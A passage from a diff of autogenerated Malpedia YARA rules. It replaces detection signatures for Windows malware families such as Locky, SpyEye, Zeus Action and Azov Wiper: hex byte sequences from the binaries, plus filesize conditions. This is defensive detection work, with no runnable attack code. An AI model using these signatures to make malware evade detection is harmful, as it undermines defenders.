= { 8d7508 83ec1c 8bcc 8bc6 c741140f000000 895910 896598 } + $sequence_0 = { be01000000 8bc6 e9???????? 4803c9 488b6cca08 4885ed 74e7 } + $sequence_1 = { c3 4533c0 418d5002 8d4a15 ff15???????? 4883f8ff } + $sequence_2 = { e9???????? 488d0d823e0300 4889bc24a0000000 e8???????? 488bf8 4885c0 7508 } + $sequence_3 = { ff15???????? 488b742460 4885db 7409 488bcb ff15???????? 8bc7 } + $sequence_4 = { 80b85011000001 488d152cc40400 488d0d4dc40400 480f45d1 488bc8 e8???????? 488bf8 } + $sequence_5 = { 8d5001 8d4838 ff15???????? 488bf8 4885c0 7508 8d471b } + $sequence_6 = { f20f1101 e9???????? 0f57c0 f2480f2a87100b0000 f20f1101 e9???????? 0f57c0 } + $sequence_7 = { bf05000000 8bc7 eb53 bf02000000 8bc7 eb4a 664183f804 } + $sequence_8 = { 85c0 742e 0fbe03 4c8d156f8ffdff 83c0e0 83f85a 0f8765020000 } + $sequence_9 = { e8???????? 488b8f50070000 4885c9 7469 ff15???????? 488983d0060000 4885c0 } condition: - 7 of them and filesize <1076224 + 7 of them and filesize <995328 } -rule MALPEDIA_Win_Zupdax_Auto : FILE +rule MALPEDIA_Win_Rtm_Locker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0a0ddf15-919a-51b3-8d2b-36d56a66b11c" + id = "a8f49436-bcde-542d-92ad-a9016371f8b8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdax" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zupdax_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rtm_locker_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "b6e9bce8da2b32bfb52c3b6477d889790098710bc4ce9f32e2c7bd1bace10557" + logic_hash = "61d8b5fbf492d5b9d06c2052f9a6a3111c4e3f003fd0450ca27ee699de4151fc" score = 75 quality = 75 tags = "FILE" @@ -136026,32 +138800,32 @@ rule MALPEDIA_Win_Zupdax_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 895e2c e8???????? 8b460c 83c404 3bc3 7419 } - $sequence_1 = { 8b4c2408 8b7e10 51 e8???????? 8b560c 52 e8???????? } - $sequence_2 = { 52 68???????? ff15???????? 8d442444 } - $sequence_3 = { e8???????? 83c408 8b4618 50 895e24 895e28 895e2c } - $sequence_4 = { 394c2414 765b 53 41 81e1ff000080 } - $sequence_5 = { 4b 81cb00ffffff 43 0fb61403 30142f 47 } - $sequence_6 = { 895710 8b4614 894e14 8b5718 894714 8b4618 895618 } - $sequence_7 = { 2bc2 50 8d54241c 52 } - $sequence_8 = { 46 8a1c06 881c01 881406 } - $sequence_9 = { 8b4c2408 8b7e10 51 e8???????? } + $sequence_0 = { 8d8d2cfeffff e8???????? 0f108d64fcffff 33c9 0f109574fcffff 0f109d84fcffff 0f10a594fcffff } + $sequence_1 = { 0f104630 660fefd0 0f1006 660fefc8 0f110f 0f116710 0f115f20 } + $sequence_2 = { 0f29442470 0f28842470010000 0f29842420010000 0f28842480010000 89442458 83c004 894c245c } + $sequence_3 = { e8???????? 8d8d68ffffff e8???????? 0f108568ffffff be18000000 0f1185c8feffff } + $sequence_4 = { 0fbe8098074200 40 8945cc 2b45dc 8945d4 3bc2 0f8f10020000 } + $sequence_5 = { 50 6af5 eb03 50 6af6 ff15???????? 8b04bd500f4200 } + $sequence_6 = { c1f910 884e02 8b4de0 0ac1 884603 8bc1 c1f808 } + $sequence_7 = { 897dfc 897db8 894508 85c0 0f8f3ffeffff } + $sequence_8 = { 8d442430 50 ff15???????? 8bf0 83feff 7431 } + $sequence_9 = { 8b0c85500f4200 8b45f8 807c012800 7d46 } condition: - 7 of them and filesize <1032192 + 7 of them and filesize <598016 } -rule MALPEDIA_Win_Classfon_Auto : FILE +rule MALPEDIA_Win_Spyeye_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "68a5b428-fba0-5238-83c9-3255bfbb3ff5" + id = "4b228779-0f96-5a8e-b676-8a6d855d1452" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.classfon_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spyeye_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "752d9b4933679b22e7a2ada3974321921c7722355427af1c70ee3b8ff2e5df5f" + logic_hash = "54f45a6b713b51a15663c9347e916cec35361fbd1f12608b97d32ef9d0a49fb7" score = 75 quality = 75 tags = "FILE" @@ -136065,32 +138839,32 @@ rule MALPEDIA_Win_Classfon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7462 8b542408 8b8e00020000 8b44240c } - $sequence_1 = { 8b742418 83f8ff 898600020000 7508 5f 33c0 } - $sequence_2 = { 50 ffd3 89be04020000 8b8600020000 3bc7 740e } - $sequence_3 = { 8b1d???????? a1???????? 50 57 ff15???????? } - $sequence_4 = { 8d4c241c 8d542424 51 8b4c2414 8d442424 52 } - $sequence_5 = { 8d842430020000 50 ffd7 8d8c2430010000 51 ffd7 8b542424 } - $sequence_6 = { 6a00 6a00 6a00 6802000004 6a00 899610020000 } - $sequence_7 = { 68???????? 51 c744242802000000 c744242c2c010000 ff15???????? } - $sequence_8 = { 50 ff15???????? 8bd8 83fbff 0f849c000000 8b470c 8b5708 } - $sequence_9 = { 0f85c3000000 8b460c 85c0 0f84c0000000 03c5 } + $sequence_0 = { 8d4de8 51 8d4de0 51 50 e8???????? 85c0 } + $sequence_1 = { 6a07 6800000040 57 e8???????? 8bf8 83ffff } + $sequence_2 = { 6889000000 ff7508 33db 897df8 } + $sequence_3 = { 57 6800000002 6a03 57 6a01 56 } + $sequence_4 = { 56 6880000000 6a02 eb08 56 6880000000 6a04 } + $sequence_5 = { 85c0 7407 c745f801000000 397dfc 740e } + $sequence_6 = { be80000000 56 6a03 57 6a01 6889000000 ff7508 } + $sequence_7 = { 53 e8???????? 85c0 7407 c745f801000000 397dfc 740e } + $sequence_8 = { 8965fc ff7510 ff750c ff7508 ffd0 8b65fc } + $sequence_9 = { 7454 57 56 6a03 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <741376 } -rule MALPEDIA_Win_Donot_Auto : FILE +rule MALPEDIA_Win_Swen_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "38387986-3cf2-52ef-b35f-48e7a3ada73a" + id = "7f9f6459-0c0a-509f-9c87-8a68bae77e34" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.donot_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.swen_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "856eb217efb67c7a23eb4ad0af50dccbe8bb723a98d81632999df9a793bf3e4e" + logic_hash = "6a4f1002b8a4868bbe8661a8400f2e2886c507211772c905c6406fbef250b4fb" score = 75 quality = 75 tags = "FILE" @@ -136104,32 +138878,32 @@ rule MALPEDIA_Win_Donot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b04c580b80310 5d c3 33c0 } - $sequence_1 = { c7461400000000 0f1106 f30f7e45e4 660fd64610 c745e400000000 c745e80f000000 85d2 } - $sequence_2 = { 03d3 d1fa 8d4102 894738 8b4710 8918 8b4720 } - $sequence_3 = { e8???????? 8b15???????? b910000000 2bd6 8a0432 8d7601 3046ff } - $sequence_4 = { 7361 8bc6 8bde 83e03f c1fb06 6bc838 8b049d187b0410 } - $sequence_5 = { c645fc02 8d4dbc e8???????? 8bf8 83c404 3bf7 7465 } - $sequence_6 = { 0f438540ffffff 50 ff15???????? c645fc1b 8b559c 83fa10 722c } - $sequence_7 = { c6861002000000 8b8e0c020000 83f910 722f 8b86f8010000 41 81f900100000 } - $sequence_8 = { c685bcedffff00 8d5101 8a01 41 84c0 75f9 } - $sequence_9 = { c6863801000000 8b8e34010000 83f910 722f 8b8620010000 41 81f900100000 } + $sequence_0 = { ab 8d85a8fcffff 50 8d8564fcffff 50 56 56 } + $sequence_1 = { 6a05 59 be???????? 8dbd1cfeffff f3a5 66a5 } + $sequence_2 = { 68b0040000 ff15???????? c9 c3 55 8bec 6aff } + $sequence_3 = { 33c9 85c0 0f95c1 41 890d???????? 8b450c 3905???????? } + $sequence_4 = { 59 59 50 8d8594fcffff 50 } + $sequence_5 = { 0fbe4602 8d48df 83f951 7408 83c00a 83f85c 755f } + $sequence_6 = { 53 6880000000 6a04 53 6a03 6800000040 8d85e4feffff } + $sequence_7 = { e8???????? 8d85d8fdffff 50 8d8550ffffff 50 e8???????? 8d4603 } + $sequence_8 = { 0f84b2000000 895de0 8b4de4 c1e902 8b45e0 3bc1 0f839e000000 } + $sequence_9 = { 3bc3 7410 8d8d80feffff 2bc1 40 40 89857cfeffff } condition: - 7 of them and filesize <626688 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Cloudburst_Auto : FILE +rule MALPEDIA_Win_Azov_Wiper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6b8a23fb-a80e-5e29-b2d9-5270c8f2c8ea" + id = "76e58a84-2854-5930-bc99-d7f7733110e9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cloudburst_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.azov_wiper_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "308a5032c7dd39db54565ddb9261de5bf1d032e66820b9bf51050b90dd0967a4" + logic_hash = "b6d671c16b8dc6a9d2872e0b93ec5fc03d8fe956d8f9494205bfd799936a0b79" score = 75 quality = 75 tags = "FILE" @@ -136143,32 +138917,32 @@ rule MALPEDIA_Win_Cloudburst_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4533c2 4133e8 45894424f8 41896c24fc 8bc5 } - $sequence_1 = { 4883ec08 8b05???????? 41be01000000 4c892c24 85c0 } - $sequence_2 = { 4c892c24 85c0 4c8bd9 4c8bd2 410f44c6 4533ed } - $sequence_3 = { 488b0d???????? 488d542444 4533c9 4533c0 488bf8 418bdd ff15???????? } - $sequence_4 = { 458942f4 458b4c24f8 418bc1 c1e818 } - $sequence_5 = { ba00080000 488bcb e8???????? 4c8d442430 } - $sequence_6 = { 8b05???????? 41be01000000 4c892c24 85c0 4c8bd9 } - $sequence_7 = { 03c2 8bc8 83e00f 3bc2 7407 } - $sequence_8 = { 33d6 41891424 4133d3 33fa 4189542404 33df 41897c2408 } - $sequence_9 = { 41b904000000 4c8d442440 418d5101 ff15???????? 85c0 74b1 } + $sequence_0 = { 4c8bc8 4885c0 7455 488d442440 } + $sequence_1 = { 488d5201 6685c0 75ee 488b05???????? 488bcb 488b10 ff9250010000 } + $sequence_2 = { 41ff9288010000 85c0 740f 4881c79a020000 4889bc2410030000 483bbc2418030000 0f8c73ffffff } + $sequence_3 = { 48894c2440 4533c0 48898c2470080000 4c8b10 488d842470080000 } + $sequence_4 = { 33d2 33c9 48897c2420 4c8b10 41ff92b0000000 8bce } + $sequence_5 = { 4c8b00 41ff5058 85c0 0f84c6000000 4c89b42480000000 448d4b04 } + $sequence_6 = { 488bcb 4c8b10 41ff9288010000 85c0 740f 4881c79a020000 } + $sequence_7 = { 4883ec20 4080e4f0 c645f356 c645f469 c645f572 } + $sequence_8 = { 488945f8 4883ec08 48890424 4883ec08 } + $sequence_9 = { 0f8493000000 488bd0 488bcb 482bd3 } condition: - 7 of them and filesize <2363392 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Rekoobew_Auto : FILE +rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "73ccfc35-4eed-5955-a644-c948264eda18" + id = "452f6306-c16f-58b7-84a1-ee288d662c0a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rekoobew_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_ausov_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "445ddabcfd3896aee22b87d60b9d2106a9693bf00a56789028f0bf36c80e8900" + logic_hash = "e12dc956bf634cd764e774e1669338328ccbb898d34279d3918e11978d93f5a2" score = 75 quality = 75 tags = "FILE" @@ -136182,32 +138956,32 @@ rule MALPEDIA_Win_Rekoobew_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 337dec 337dd0 d1c7 897db8 8d8c39dcbc1b8f 894df0 89c1 } - $sequence_1 = { 89e5 57 56 53 81ecbc000000 e8???????? 8945e0 } - $sequence_2 = { 89df 0fb63482 c1e618 0fb65c8201 } - $sequence_3 = { 8b1c9de0944000 c1e310 31df 8b4dd8 0fb6dd 8b1c9de0944000 c1e308 } - $sequence_4 = { 7409 3b7510 0f8fd3000000 0fb645e8 c1e004 89c7 b8ffffffff } - $sequence_5 = { c744240808000000 89742404 891c24 e8???????? c744240804000000 897c2404 891c24 } - $sequence_6 = { 8b3c95e07c4000 33bb54010000 8b55f0 c1ea18 333c95e0704000 89f2 c1ea10 } - $sequence_7 = { 56 53 83ec5c 8b450c 0fb65003 0fb638 } - $sequence_8 = { 89f1 31d1 31d9 8d0c0f 89c7 c1c705 01f9 } - $sequence_9 = { 895008 8b500c 89d6 c1ee18 8b3cb5e0944000 89d6 } + $sequence_0 = { 0f8501000000 f8 8b95f8fbffff 0355fc 8995f8fbffff 0f8407000000 } + $sequence_1 = { 83bdc4fdffff00 7507 33c0 e9???????? 8d8da8faffff 898d4cfaffff } + $sequence_2 = { 0f8487000000 8b3d???????? 68???????? 56 } + $sequence_3 = { 0f8407000000 0f8501000000 f8 68???????? } + $sequence_4 = { 83c101 894df8 8b55f8 3b55f4 7d31 0f8407000000 } + $sequence_5 = { f7d1 83c1ff 51 8d95f8feffff 52 } + $sequence_6 = { 0f8501000000 f8 68???????? 8d8dfcfbffff 51 } + $sequence_7 = { 6804010000 8d85a8faffff 50 68???????? ff15???????? 8985c4fdffff 83bdc4fdffff00 } + $sequence_8 = { 81ec10040000 53 56 57 0f8407000000 0f8501000000 } + $sequence_9 = { e8???????? 83c404 8b4d0c 894104 e9???????? 8dbdfcfbffff 83c9ff } condition: - 7 of them and filesize <248832 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Dimnie_Auto : FILE +rule MALPEDIA_Win_Donot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8c590346-8ec4-5fdf-b560-136be983395f" + id = "38387986-3cf2-52ef-b35f-48e7a3ada73a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dimnie_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.donot_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "0f3f067f034444fcc73a96e10a6a53b5dc6ee2b790aaefb3f5f862bcac5e875a" + logic_hash = "856eb217efb67c7a23eb4ad0af50dccbe8bb723a98d81632999df9a793bf3e4e" score = 75 quality = 75 tags = "FILE" @@ -136221,32 +138995,32 @@ rule MALPEDIA_Win_Dimnie_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7605 8b450c eb54 8b550c 2b5508 83fa01 751c } - $sequence_1 = { 33c0 eb6e 8b4508 3b450c 7505 8b4508 } - $sequence_2 = { 8945f4 8b45f4 c1e804 8945f4 8b4df8 83c101 } - $sequence_3 = { 8b550c 2b5508 8955f8 0f31 8945f4 8b45f4 c1e804 } - $sequence_4 = { eb6e 8b4508 3b450c 7505 8b4508 eb61 } - $sequence_5 = { 2b5508 83fa01 751c 0f31 } - $sequence_6 = { 8b4508 eb61 8b4d08 3b4d0c 7605 8b450c } - $sequence_7 = { 8b4d0c 8a55af 885102 837d1002 7e13 8b4508 0fb64802 } - $sequence_8 = { 8b4510 8b08 83e107 8b5510 890a } - $sequence_9 = { c70201000000 8b4508 8b08 83e10f 8b5508 890a 8b450c } + $sequence_0 = { 8b04c580b80310 5d c3 33c0 } + $sequence_1 = { c7461400000000 0f1106 f30f7e45e4 660fd64610 c745e400000000 c745e80f000000 85d2 } + $sequence_2 = { 03d3 d1fa 8d4102 894738 8b4710 8918 8b4720 } + $sequence_3 = { e8???????? 8b15???????? b910000000 2bd6 8a0432 8d7601 3046ff } + $sequence_4 = { 7361 8bc6 8bde 83e03f c1fb06 6bc838 8b049d187b0410 } + $sequence_5 = { c645fc02 8d4dbc e8???????? 8bf8 83c404 3bf7 7465 } + $sequence_6 = { 0f438540ffffff 50 ff15???????? c645fc1b 8b559c 83fa10 722c } + $sequence_7 = { c6861002000000 8b8e0c020000 83f910 722f 8b86f8010000 41 81f900100000 } + $sequence_8 = { c685bcedffff00 8d5101 8a01 41 84c0 75f9 } + $sequence_9 = { c6863801000000 8b8e34010000 83f910 722f 8b8620010000 41 81f900100000 } condition: - 7 of them and filesize <212992 + 7 of them and filesize <626688 } -rule MALPEDIA_Win_Locky_Auto : FILE +rule MALPEDIA_Win_Aveo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0065ec05-3bad-56a6-868c-9fbbe2e6de6d" + id = "20a83532-4a6e-562c-b0b0-f75c536df8d1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.locky_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aveo_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "3ed4a85dfe440bb226db6c3cc6e1aa5c521449c7aa69fbc084d35b1292d156c0" + logic_hash = "0a926409298a7da9832c13e4dae3f40393311db59f4c541fcfd58f63e4b0b943" score = 75 quality = 75 tags = "FILE" @@ -136260,38 +139034,32 @@ rule MALPEDIA_Win_Locky_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89b560ffffff 898568ffffff ffd7 8bf8 897de0 3bfb } - $sequence_1 = { 8b4db8 3975cc 7303 8d4db8 8b45d4 3975e8 } - $sequence_2 = { 50 50 50 894de8 8b4d08 } - $sequence_3 = { 8d459c 50 8d45b8 50 e8???????? 59 59 } - $sequence_4 = { 46 3bf0 7621 8bc8 d1e9 ba49922409 } - $sequence_5 = { 8bc6 03c1 3810 7412 83ff10 7204 } - $sequence_6 = { 837e1410 8b4610 7202 8b36 50 56 8d45f0 } - $sequence_7 = { 83c9ff 8bf0 51 e8???????? 40 50 } - $sequence_8 = { 03d3 5b c21000 e9???????? 8bff 55 8bec } - $sequence_9 = { 6a44 90 e9???????? 90 } - $sequence_10 = { 5d 90 ebf6 90 } - $sequence_11 = { 83c40c e9???????? 90 8d00 } - $sequence_12 = { 66ab e9???????? 90 8d36 } - $sequence_13 = { ff15???????? e9???????? 90 50 90 } - $sequence_14 = { 66ab 90 e9???????? 8d36 } - $sequence_15 = { 5e c21000 8bff 55 8bec 33c0 8b4d08 } + $sequence_0 = { 8b85ecfaffff 83c40c 50 8bcb 51 8db5f8fdffff } + $sequence_1 = { 53 56 57 8db570faffff } + $sequence_2 = { 8d8d10feffff e8???????? 8b95f8fdffff 52 8bf0 } + $sequence_3 = { 8b4de0 8d55dc 52 6800008000 } + $sequence_4 = { 8d8554faffff 8d8d70faffff e8???????? 8b955cfaffff 52 e8???????? } + $sequence_5 = { 50 f3a4 ff15???????? 6800010000 8d8df8feffff 6a00 51 } + $sequence_6 = { 53 8d4802 8955f4 56 8a51fe } + $sequence_7 = { 7424 8b85f4efffff 3bc7 741a } + $sequence_8 = { c7442418e8030000 ff15???????? 3bc7 740c 68???????? 50 } + $sequence_9 = { c7430801000000 e8???????? 6a06 89430c 8d4310 8d89d41a4100 5a } condition: - 7 of them and filesize <1122304 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Fishmaster_Auto : FILE +rule MALPEDIA_Win_Zeus_Action_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ac4d1a12-e633-54d1-8952-cc6fd81de034" + id = "65e8f438-ad6b-5cc2-8433-22cd51967cfc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fishmaster_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_action_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "ee895ce428e3021476e31fc5a4cbc7a0e07349c7fde3100efce8681f3e034d54" + logic_hash = "d578cc91c04661eaf2cc2ee8b8d1f82a11b119d1521d38f5e03bfba5cd5d37a6" score = 75 quality = 75 tags = "FILE" @@ -136305,32 +139073,32 @@ rule MALPEDIA_Win_Fishmaster_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4883f81f 7736 498bc8 e8???????? 48c7471000000000 } - $sequence_1 = { e8???????? 488bc3 4c8b4318 4983f810 } - $sequence_2 = { 7203 498b06 40883c08 c644080100 e9???????? 440fb6cf } - $sequence_3 = { 488d156e220000 488bcb ff15???????? 488d156e220000 488bcb ff15???????? 4c8be8 } - $sequence_4 = { 4157 4883ec60 488bfa 488bd9 33f6 897098 488970b0 } - $sequence_5 = { 48837f1810 7203 488b07 488d4c2438 } - $sequence_6 = { 0fb65310 8d42ff 3cfd 7718 88940d84000000 4883c314 } - $sequence_7 = { 46383400 75f7 488d9580000000 488d4d20 e8???????? } - $sequence_8 = { 480f434c2440 420fb6440803 4288440904 488d442440 48837c245810 480f43442440 488d4c2440 } - $sequence_9 = { 4c8b45f8 488d15ce200000 488bcf ff15???????? 488bf8 4c89742430 4489742428 } + $sequence_0 = { 668945fa 8d75f4 a5 a5 a5 8383d87500000c 33f6 } + $sequence_1 = { 7417 8b01 57 51 ff5034 8b4de8 85c9 } + $sequence_2 = { ff15???????? b800080000 663b05???????? 7510 e8???????? 84c0 7407 } + $sequence_3 = { 894508 3bf0 7433 8d7b14 85f6 7504 33c0 } + $sequence_4 = { 0f84d0020000 395df8 0f84c7020000 395df4 0f84be020000 395dd0 0f84b5020000 } + $sequence_5 = { 49 3bc6 7509 8b7dd8 894de8 } + $sequence_6 = { 59 85c0 0f8479010000 837ddc00 740f 53 e8???????? } + $sequence_7 = { 83c0fb 83f803 7740 f745d000080000 7416 03f9 03d9 } + $sequence_8 = { 50 8b4618 83c004 50 ff15???????? 8b761c 83c40c } + $sequence_9 = { ff15???????? 85c0 7817 56 8d85f8fdffff 50 8d85f0fbffff } condition: - 7 of them and filesize <812032 + 7 of them and filesize <827392 } -rule MALPEDIA_Win_Webbytea_Auto : FILE +rule MALPEDIA_Win_Crenufs_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b6cb62e5-1486-5f7a-9ab4-363544b06e24" + id = "f753eb30-be4b-5f62-9991-28649f65a79a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webbytea_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crenufs_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "a39ccb63aa5f0dcb105213662a0cd0fec06d0e89771a8eab5add75ac05faf27d" + logic_hash = "62adacba8819f400983ac2aed5807f2d80c5566db3c1a2873916dcd6fb658c9d" score = 75 quality = 75 tags = "FILE" @@ -136344,32 +139112,32 @@ rule MALPEDIA_Win_Webbytea_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? c744242000000000 4533c9 4533c0 33d2 33c9 } - $sequence_1 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 } - $sequence_2 = { 8b00 ffc0 488b8c2488020000 8901 488d542430 488b4c2420 } - $sequence_3 = { 488b8c2488020000 8901 488d542430 488b4c2420 ff15???????? 85c0 } - $sequence_4 = { 488b842488020000 8b00 ffc0 488b8c2488020000 } - $sequence_5 = { eb08 8b0424 ffc0 890424 8b442438 390424 } - $sequence_6 = { 488b842488020000 8b00 ffc0 488b8c2488020000 8901 488d542430 488b4c2420 } - $sequence_7 = { c7042400000000 eb08 8b0424 ffc0 890424 8b442438 } - $sequence_8 = { 488b8c2488020000 8901 488d542430 488b4c2420 } - $sequence_9 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 c68424f500000065 } + $sequence_0 = { 8b0c8de0934000 25ff000000 c1ea18 33cb 8b1c95e08f4000 8b56f8 } + $sequence_1 = { 55 56 57 8bf9 8a4c2444 33ed 884c2425 } + $sequence_2 = { ff15???????? 56 8d4d90 c645fc05 ff15???????? 56 8d4de0 } + $sequence_3 = { ffd0 83c408 53 ff15???????? 8b44243c 8b4e08 3bc5 } + $sequence_4 = { 59 50 57 8d4de0 ff15???????? bf???????? 57 } + $sequence_5 = { 750c 8b3d???????? 891d???????? 8d4c2444 ff15???????? 3bfb 7409 } + $sequence_6 = { ff15???????? 8d8d3cf2ffff c645fc03 e8???????? c645fc02 56 } + $sequence_7 = { 84c0 89542410 743e 3b31 752d 53 56 } + $sequence_8 = { 8d4c2444 895c2428 895c2430 33ff ff15???????? a1???????? 48 } + $sequence_9 = { 895dfc e8???????? 8b10 8bc8 ff5210 } condition: - 7 of them and filesize <552960 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Mespinoza_Auto : FILE +rule MALPEDIA_Win_Miragefox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6af67872-bac6-59d0-8e7f-a6515453822a" + id = "7d7cd6d5-44d9-5ffc-a5c9-9ff4ba40c5bc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mespinoza_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miragefox_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "b9e1c3335fd9ffa3b60b976c6289b141c236447ff76a5dd17787957756af56c7" + logic_hash = "f8d9e523d9895537a03eee9c6c67877c75001719916af13d5bd2cc1c1b329b5b" score = 75 quality = 75 tags = "FILE" @@ -136383,32 +139151,32 @@ rule MALPEDIA_Win_Mespinoza_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4d9c e8???????? 83eb01 75e7 8b4d0c } - $sequence_1 = { 897d0c c645fc01 85ff 7446 56 8bcf e8???????? } - $sequence_2 = { 8b4dc4 8b7dc0 6aff 6a01 } - $sequence_3 = { 891f 895f04 6a01 895dfc e8???????? 59 894704 } - $sequence_4 = { 03c1 3bc1 7334 8bde 8bf1 2bf0 } - $sequence_5 = { 75f9 2bd6 8db5f8feffff 8d5e01 8a06 46 84c0 } - $sequence_6 = { 83e03f 6bd030 895de4 8b049d00b04700 8945d4 8955e8 